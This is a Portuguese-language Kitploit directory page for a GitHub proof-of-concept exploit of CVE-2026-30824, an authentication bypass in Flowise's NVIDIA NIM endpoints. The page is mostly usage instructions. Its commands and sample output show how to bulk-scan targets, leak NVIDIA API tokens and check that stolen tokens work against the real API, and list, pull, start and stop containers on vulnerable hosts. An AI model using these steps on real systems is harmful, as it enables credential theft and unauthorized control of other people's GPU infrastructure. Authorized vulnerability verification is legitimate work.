Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-30824-Flowise-NVIDIA-NIM-Authentication — Um exploit de prova de conceito para **CVE-2026-30824**, uma vulnerabilidade crítica de bypass de autenticação no Flowise que expõe endpoints da API NVIDIA NIM sem autenticação. | Kitploit
Ferramentas/GitHubGitHub/dylvie/cve-2026-30824-flowise-nvidia-nim-authentication
ReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Segurança de APIsTestes de Penetração
GitHubdylvie/cve-2026-30824-flowise-nvidia-nim-authentication

CVE-2026-30824-Flowise-NVIDIA-NIM-Authentication

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Um exploit de prova de conceito para **CVE-2026-30824**, uma vulnerabilidade crítica de bypass de autenticação no Flowise que expõe endpoints da API NVIDIA NIM sem autenticação.

Ver Repositório
28há 5 mesesAinda não revisado
Compartilhar

CVE-2026-30824 — Verificador e Exploit de Bypass de Autenticação NVIDIA NIM no Flowise

Um verificador e exploit de prova de conceito para CVE-2026-30824, uma vulnerabilidade crítica de bypass de autenticação no Flowise que expõe endpoints da API NVIDIA NIM sem autenticação.

Visão Geral da Vulnerabilidade

CVE-2026-30824 é um bypass de autenticação crítico no Flowise (< 3.0.13) que permite que atacantes remotos não autenticados acessem endpoints de gerenciamento de contêineres NVIDIA NIM e de geração de tokens de API.

CampoValor
Pontuação CVSS9.8 (Crítico)
CWECWE-306: Ausência de Autenticação para Função Crítica
Versões AfetadasFlowise < 3.0.13
ImpactoGerenciamento completo de contêineres, acesso à GPU, roubo de tokens

Causa Raiz

O caminho /api/v1/nvidia-nim/* está na lista de permissões do middleware global de autenticação, permitindo acesso não autenticado a:

  • Geração e vazamento de tokens
  • Gerenciamento de contêineres (listar, iniciar, parar)
  • Pull de imagens Docker
  • Integração com a API NVIDIA

Recursos

✅ Detecção de Vulnerabilidade — Verificação rápida se o alvo é vulnerável
✅ Extração de Tokens — Vazamento de tokens da API NVIDIA de endpoints vulneráveis
✅ Validação de Tokens — Verificação de tokens contra a API NVIDIA (demonstra o raio de impacto)
✅ Enumeração de Contêineres — Lista contêineres NIM em execução
✅ Varredura em Lote — Varre vários alvos a partir de um arquivo
✅ Bypass de SSL — Ignora certificados autoassinados por padrão
✅ Saída Colorida — Indicadores de status fáceis de ler (verde/amarelo/vermelho)
✅ Reconhecimento — Mapeamento completo de endpoints e diagnósticos


Instalação

Pré-requisitos

  • Python 3.7+
  • Biblioteca requests

Configuração

# Clone ou baixe o script
git clone <repository>
cd cve-2026-30824

# Instale as dependências
pip install -r requirements.txt
# ou
pip install requests

Uso

Verificação Básica de Vulnerabilidade

# Verifica se um único alvo é vulnerável
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --check

# Saída esperada (VULNERÁVEL):
# [+] Alvo parece VULNERÁVEL (HTTP 200)
#     Resposta: {...}

Varredura de Múltiplos Alvos

# Crie targets.txt com uma URL por linha
cat > targets.txt << EOF
http://192.168.1.100:3000
http://192.168.1.101:3000
http://192.168.1.102:3000
EOF

# Varra todos os alvos (modo rápido, sem prompts)
python3 CVE-2026-30824.py -f targets.txt --scan-only

# Saída resumida esperada:
# ============================================================
# [*] Resumo da Varredura
# ============================================================
# [+] VULNERÁVEIS: 2
#     ✓ http://192.168.1.100:3000
#     ✓ http://192.168.1.101:3000
# [-] CORRIGIDOS: 1
#     ✗ http://192.168.1.102:3000

Extração de Token da API NVIDIA

# Vaza o token da API NVIDIA do endpoint vulnerável
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token

# Saída esperada:
# [*] Tentando vazar token da API NVIDIA...
# [+] Token da API NVIDIA: eyJ0eXAiOiJKV1QiLCJhbGc...
# [+] Tipo de Token: Bearer
# [+] Expira em: 3600s

Validação de Token Contra a API NVIDIA

# Verifica se um token vazado funciona contra a API NVIDIA real
python3 CVE-2026-30824.py --validate-token "eyJ0eXAiOiJKV1QiLCJhbGc..."

# Saída esperada:
# [*] Validando token contra a API NVIDIA...
# [+] Token VÁLIDO! Acesso a 45 modelos NVIDIA NIM.
#     - mistralai/mistral-7b-instruct-v0.1
#     - meta-llama/llama2-70b
#     - (...)

Listagem de Contêineres em Execução

# Enumera contêineres no alvo
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --list-containers

# Saída esperada:
# [*] Listando contêineres em execução...
# [+] HTTP 200
# [
#   {
#     "id": "abc123xyz",
#     "names": ["flowise_nim"],
#     "image": "nvcr.io/nvidia/nim:latest",
#     "state": "running"
#   }
# ]

Reconhecimento Completo (Todas as Verificações)

# Executa todas as verificações de reconhecimento no alvo vulnerável
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all

Opções de Linha de Comando

usage: CVE-2026-30824.py [-h] [-t TARGET] [-f TARGETS_FILE] [--check]
                             [--scan-only] [--get-token]
                             [--validate-token TOKEN] [--list-containers]
                             [--get-container CONTAINER_ID]
                             [--get-image IMAGE_ID] [--pull-image IMAGE_TAG]
                             [--start-container IMAGE_TAG]
                             [--container-name CONTAINER_NAME]
                             [--stop-container CONTAINER_ID] [--preload]
                             [--all] [--timeout TIMEOUT] [--debug]

Argumentos opcionais:
  -h, --help                    Mostra esta mensagem de ajuda e sai
  -t, --target TARGET           URL do alvo (ex.: http://192.168.1.100:3000)
  -f, --targets-file FILE       Arquivo com lista de alvos (um por linha)
  
Detecção de Vulnerabilidade:
  --check                       Apenas verifica se o alvo é vulnerável
  --scan-only                   Varre alvos em busca de vulnerabilidade sem prompts
  --debug                       Mostra detalhes da requisição e respostas brutas
  
Exploração:
  --get-token                   Vaza token da API NVIDIA
  --validate-token TOKEN        Valida token vazado contra a API NVIDIA
  --list-containers             Lista contêineres NIM em execução
  --get-container CONTAINER_ID  Obtém detalhes do contêiner
  --get-image IMAGE_ID          Obtém detalhes da imagem
  --pull-image IMAGE_TAG        Faz pull de uma imagem Docker (ex.: nvcr.io/nvidia/nim:latest)
  --start-container IMAGE_TAG   Inicia um contêiner a partir de uma tag de imagem
  --container-name NAME         Nome para o contêiner iniciado
  --stop-container CONTAINER_ID Para um contêiner em execução
  --preload                     Aciona endpoint de pré-carregamento de recursos
  --all                         Executa todas as verificações de reconhecimento
  
Avançado:
  --timeout SECONDS             Timeout de requisição em segundos (padrão: 15)

Exemplos de Fluxo de Trabalho

Cenário 1: Avaliação de Rede Interna

# 1. Varre toda a sub-rede em busca de instâncias vulneráveis
python3 CVE-2026-30824.py -f internal_ips.txt --scan-only

# 2. Para cada alvo vulnerável, extrai o token
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token

# 3. Valida o impacto do token
python3 CVE-2026-30824.py --validate-token "<token-extraido>"

Cenário 2: Prova de Impacto

# Verifica a vulnerabilidade e demonstra o raio de impacto completo
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all

# Isso irá:
# 1. Verificar a vulnerabilidade
# 2. Extrair o token da API NVIDIA
# 3. Validar o token contra a API NVIDIA
# 4. Listar contêineres em execução
# 5. Mostrar enumeração de recursos

Cenário 3: Monitoramento Contínuo

# Monitora um alvo periodicamente (via cron ou agendador)
python3 CVE-2026-30824.py -f monitored_targets.txt --scan-only > scan_$(date +%s).log

Indicadores de Saída

Cores

  • 🟢 VERDE — Alvo vulnerável ou exploração bem-sucedida
  • 🟡 AMARELO — Corrigido/não vulnerável ou aviso
  • 🔴 VERMELHO — Erro ou falha de conexão

Códigos de Status

HTTPSignificado
200✅ Vulnerável (endpoint acessível)
400✅ Vulnerável (erro de aplicação, mas o endpoint existe)
401🟡 Corrigido (autenticação necessária)
404🟡 Não é Flowise ou o endpoint não existe
5xx🔴 Erro de servidor/configuração incorreta

Solução de Problemas

"Resposta HTML em vez de JSON"

Problema: O endpoint retorna uma página HTML em vez de uma resposta JSON da API.

Baixar ferramenta